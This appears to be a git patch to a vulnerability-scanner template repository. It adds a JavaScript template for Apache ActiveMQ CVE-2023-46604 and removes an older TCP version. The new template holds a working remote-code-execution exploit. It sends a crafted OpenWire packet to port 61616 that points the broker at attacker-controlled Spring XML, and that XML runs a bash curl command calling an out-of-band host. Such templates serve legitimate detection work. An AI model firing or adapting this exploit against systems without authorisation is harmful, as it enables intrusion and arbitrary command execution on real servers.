From 2768ab1b32e081d99731d6c2850a512cde920cb7 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 12 Dec 2023 18:35:16 +0530 Subject: [PATCH] Improved template for CVE-2023-46604 detection (#8807) * Added JS based template for CVE-2023-46604 * removed less reliable template --- javascript/cves/2023/CVE-2023-46604.yaml | 64 ++++++++++++++++++++++++ network/cves/2023/CVE-2023-46604.yaml | 52 ------------------- 2 files changed, 64 insertions(+), 52 deletions(-) create mode 100644 javascript/cves/2023/CVE-2023-46604.yaml delete mode 100644 network/cves/2023/CVE-2023-46604.yaml diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml new file mode 100644 index 0000000000..58c81eea4a --- /dev/null +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -0,0 +1,64 @@ +id: CVE-2023-46604 + +info: + name: Apache ActiveMQ - Remote Code Execution + author: Ice3man,Mzack9999,pdresearch + severity: critical + description: | + Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. + Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue. + reference: + - http://www.openwall.com/lists/oss-security/2023/10/27/5 + - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt + - https://github.com/X1r0z/ActiveMQ-RCE + - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog + - https://paper.seebug.org/3058/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-46604 + cwe-id: CWE-502 + epss-score: 0.96805 + epss-percentile: 0.99601 + cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: activemq + shodan-query: product:"ActiveMQ OpenWire Transport" + tags: cve,cve2023,network,rce,apache,activemq,deserialization,kev + +variables: + prefix: "1f00000000000000000001010042" + classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401" + final: "{{prefix}}{{classname}}" + +javascript: + - code: | + let m1 = require('nuclei/net'); + let m2 = require('nuclei/bytes'); + let b = m2.Buffer(); + let name=Host+':'+Port; + let conn = m1.Open('tcp', name); + let oob='{{interactsh-url}}' + let randomvar = '{{randstr}}' + var Base64={encode: btoa} + exploit_xml='http://{{interactsh-url}}/b64_body:'+Base64.encode(' bash-ccurl http://$(echo '+randomvar+').'+oob+' ') +'/' + packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010" + packet+=(exploit_xml.length).toString(16) + packet+=(b.WriteString(exploit_xml)).Hex() + conn.SendHex(packet); + resp = conn.RecvString() + randomvar + + args: + Host: "{{Host}}" + Port: "61616" + + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(interactsh_request, response)' + condition: and \ No newline at end of file diff --git a/network/cves/2023/CVE-2023-46604.yaml b/network/cves/2023/CVE-2023-46604.yaml deleted file mode 100644 index d2966418c7..0000000000 --- a/network/cves/2023/CVE-2023-46604.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2023-46604 - -info: - name: Apache ActiveMQ - Remote Code Execution - author: Ice3man,Mzack9999,pdresearch - severity: critical - description: | - Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. - Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue. - reference: - - http://www.openwall.com/lists/oss-security/2023/10/27/5 - - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt - - https://github.com/X1r0z/ActiveMQ-RCE - - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog - - https://paper.seebug.org/3058/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H - cvss-score: 10 - cve-id: CVE-2023-46604 - cwe-id: CWE-502 - epss-score: 0.00053 - metadata: - max-request: 1 - shodan-query: product:"ActiveMQ OpenWire Transport" - verified: true - tags: cve,cve2023,network,rce,apache,activemq,deserialization - -variables: - prefix: "1f00000000000000000001010042" - classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401" - final: "{{prefix}}{{classname}}" - -tcp: - - inputs: - - data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}" - - host: - - "{{Hostname}}" - port: 61616 - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - - "http" - - - type: word - words: - - "ActiveMQ" - - "StackTraceEnabled" - condition: and -# digest: 4b0a00483046022100f363443cf43dcc6cfff466d9b2f2606a19f6366bf864994566b83a1b1a62b524022100886785b126a725f1ea5ff4295d1d61cfc9767f17a1a5de7d28c16744f15d1bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file